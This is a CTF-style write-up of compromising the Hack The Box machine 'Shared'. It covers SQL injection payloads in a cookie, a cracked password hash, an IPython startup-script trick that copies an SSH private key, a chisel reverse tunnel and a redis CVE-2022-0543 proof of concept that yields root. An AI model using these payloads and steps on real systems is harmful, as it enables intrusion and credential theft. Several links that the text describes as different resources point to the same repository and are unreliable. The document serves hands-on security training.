Shared - HTB - Key Points
October 25, 2022•838 words
Target's IP: 10.10.11.172
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
Root page / redirects to: http://shared.htb
Subdomain enumeration returns checkout as a valid subdomain, so we also add checkout.shared.htb to the hosts file.
Ecommerce software by Prestashop seems subject to an exploit, more specifically https://www.exploit-db.com/exploits/45964, but I was not able to make it work.
customcart cookie is injectable, the answer when requesting the page on the checkout domain changes size when the query is successful, we can use it to build a SQL injection to retrieve content.
Using ORDER BY to enumerate the number of columns, we discover we need to ask for 3 columns in order to build a successful query.
{"SS5UMYLB' AND 1=0 UNION SELECT 1,2,3-- -'":"1"} allows us to reflect our content on the webpage, from here we star enumerating the DB.{"SS5UMYLB' AND 1=0 UNION SELECT 1,groupconcat(schemaname),3 from informationschema.schemata-- -'":"1"}returns the available schema names, which are informationschema and checkout.
{"SS5UMYLB' AND 1=0 UNION SELECT 1,groupconcat(tablename),3 from informationschema.tables where tableschema='checkout'-- -'":"1"}returns available tables, which are user and product.
{"SS5UMYLB' AND 1=0 UNION SELECT 1,groupconcat(columnname),3 from informationschema.columns where tablename='user'-- -'":"1"}returns available columns, which are id, username and password.
{"SS5UMYLB' AND 1=0 UNION SELECT 1,groupconcat(username, password),3 from user-- -'":"1"}with which we retrieve username and password from the DB.
jamesmason:fc895d4eddc2fc12f995e18c865cf273
Crackstation tells us this is MD5 for Soleil101, we can use this username and password to log into ssh.
Using pspy64 we notice a frequent command running
/bin/sh -c /usr/bin/pkill ipython; cd /opt/scriptsreview/ && /usr/local/bin/ipythonWe have access to the /opt/scriptsreview folder as part of the developer group.
Following this blog post, https://github.com/aodsec/CVE-2022-0543, we can build the following command to exploit ipython and access dan smith's ssh private key:
mkdir -m 777 /opt/scriptsreview/profiledefault; mkdir -m 777 /opt/scriptsreview/profiledefault/startup;echo "import os; os.system('cat /home/dansmith/.ssh/idrsa > /tmp/key')" > /opt/scriptsreview/profiledefault/startup/script.pydansmith@shared:~$ cat user.txt
94...dc
This user is part of a new group, sysadmin.
Checking permissions for this new group, it turns out we can access an interesting file related to the redis DB running on the box:
dansmith@shared:~$ find / -group sysadmin -type f 2>/dev/null
/usr/local/bin/redisconnectordev
If we try to run the binary on our local machine, we see it says connection refused on port 6379.
Start a netcat listener on the specified port and re-run the binary, this is what we see
listening on [any] 6379 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 36892
*2
$4
auth
$16
F2WHqJUz2WEz=Gqq
The last one looks like the password used for authenticating, but there is no username.
According to this documentation, https://github.com/aodsec/CVE-2022-0543, on the AUTH instruction, the implicit default username is "default"
We can check the tuple default:F2WHqJUz2WEz=Gqq to authenticate on the DB and it turns out these are valid credentials.
dansmith@shared:/usr/local/bin$ redis-cli -h localhost
localhost:6379> auth default F2WHqJUz2WEz=Gqq
OK
Checking out on hacktricks, https://github.com/aodsec/CVE-2022-0543, you can run commands through LUA, but you need a bypass, https://github.com/aodsec/CVE-2022-0543, that is linked on the webpage.
You cannot run it on the target because some required modules are not installed, so you can rely on remote port forward using chisel. On the attacking machine
chisel server -p 9001 --reverse &
and on the target
chisel client attacking_ip:9001 R:6379:127.0.0.1:6379
Run the CVE PoC and get RCE as root:
Please input redis ip:
>>127.0.0.1
Please input redis port:
>>6379
input exec cmd:(q->exit)
>>id
b'uid=0(root) gid=0(root) groups=0(root)\n'
input exec cmd:(q->exit)
>>cat /root/root.txt
b'9d...a3\n'
input exec cmd:(q->exit)
>>